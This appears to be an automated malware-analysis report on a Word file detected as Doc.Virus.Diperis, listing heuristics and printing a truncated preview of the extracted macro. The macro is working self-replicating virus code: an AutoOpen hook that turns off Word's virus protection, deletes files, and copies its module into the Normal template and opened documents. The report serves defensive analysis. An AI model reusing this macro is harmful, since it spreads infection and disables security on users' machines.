MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The file contains legacy WordBasic macros that attempt to disable security features and delete various files, including startup entries and temporary files. The presence of an AutoOpen macro and the ClamAV detection strongly indicate malicious intent. The script's primary function appears to be system preparation, likely for a secondary payload, though the full execution chain is not visible.
Heuristics 4
-
ClamAV: Doc.Virus.Diperis-6922877-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Virus.Diperis-6922877-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4296 bytes |
SHA-256: 5d6dedbc8f10e79014ab9ad1465e5c733a9172732cdd98ad95001ef90878d194 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Word97"
Sub WAntidot()
Options.SaveNormalPrompt = False
Options.VirusProtection = False
Options.SavePropertiesPrompt = False
CommandBars.ActiveMenuBar.Enabled = True
CommandBars("Control Toolbox").Enabled = True
CommandBars("Forms").Enabled = True
CommandBars("ActiveX Control").Enabled = True
CommandBars("Visual Basic").Enabled = True
On Error Resume Next
Kill "C:\Program Files\Microsoft Office\Office\StartUp\*.dot"
Kill "C:\WINDOWS\FAQ.doc"
Kill "C:\WINDOWS\Application Data\Microsoft\Excel\XLSTART\excel2r.xls"
Kill "C:\Program Files\Microsoft Office\Office\XLStart\excel2r.xls"
Kill "C:\windows.reg"
Kill "C:\fix.bat"
Kill "C:\sex.txt.vbs"
A2N
z = 0
p = MsgBox("File diperiksa : " + ActiveDocument.Name + " !")
On Error Resume Next
For Each obj In ActiveDocument.VBProject.VBComponents
z = z + 1
If obj.Name = "Word97" Or obj.Name = "ThisDocument" Then
GoTo lompat
End If
Set mok = ActiveDocument.VBProject.VBComponents.Item(z)
xx = mok.CodeModule.CountOfLines
xy = Int(xx / 25) + 1
x = 0
xyz = 1
p = MsgBox("Ditemukan macro : " + obj.Name + " !")
While x < xy
xad1 = mok.CodeModule.Lines(xyz, 25)
x = x + 1
xyz = xyz + 25
Wend
ActiveDocument.VBProject.VBComponents(z).export "c:\my documents\" & obj.Name & "m2r.txt"
ActiveDocument.VBProject.VBComponents.Remove ActiveDocument.VBProject.VBComponents(obj.Name)
lompat:
Next obj
On Error Resume Next
For Each obj In NormalTemplate.VBProject.VBComponents
If obj.Name <> "Word97" And obj.Name <> "ThisDocument" Then
NormalTemplate.VBProject.VBComponents.Remove NormalTemplate.VBProject.VBComponents(obj.Name)
End If
Next obj
p = MsgBox("File : " + ActiveDocument.Name + " bebas dari macro !")
End Sub
Sub FileOpen()
WordBasic.DisableAutoMacros True
On Error Resume Next
If Dialogs(wdDialogFileOpen).Show <> 0 Then
WAntidot
End If
N2A
WordBasic.DisableAutoMacros False
End Sub
Sub AutoOpen()
WordBasic.DisableAutoMacros True
On Error Resume Next
A2N
WAntidot
N2A
WordBasic.DisableAutoMacros False
End Sub
Sub A2N()
TempPath = Application.NormalTemplate.Path & Application.PathSeparator
Set Sumber = ActiveDocument
Set Target = NormalTemplate
sehat = False
For Each obj In Target.VBProject.VBComponents
If obj.Name = "Word97" Then sehat = True
If (obj.Name <> "ThisDocument") And (obj.Name <> "Reference To Normal") And (obj.Name <> "Word97") Then
Target.VBProject.VBComponents.Remove Target.VBProject.VBComponents(obj.Name)
objKorban = True
End If
Next obj
If sehat = False Then
x = Infect(Sumber, Target, "Word97")
End If
On Error Resume Next
NormalTemplate.Save
End Sub
Function Infect(Sumber, Target, obj As String) As Boolean
On Error GoTo ILari
Sumber.VBProject.VBComponents(obj).export TempPath & obj
Target.VBProject.VBComponents.Import TempPath & obj
Infect = True
Kill TempPath & obj
Exit Function
ILari:
End Function
Sub N2A()
TempPath = Application.NormalTemplate.Path & Application.PathSeparator
Set Sumber = NormalTemplate
Set Target = ActiveDocument
sehat = False
For Each obj In Target.VBProject.VBComponents
If obj.Name = "Word97" Then sehat = True
If (obj.Name <> "ThisDocument") And (obj.Name <> "Reference To Normal") And (obj.Name <> "Word97") Then
Target.VBProject.VBComponents.Remove Target.VBProject.VBComponents(obj.Name)
objK
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.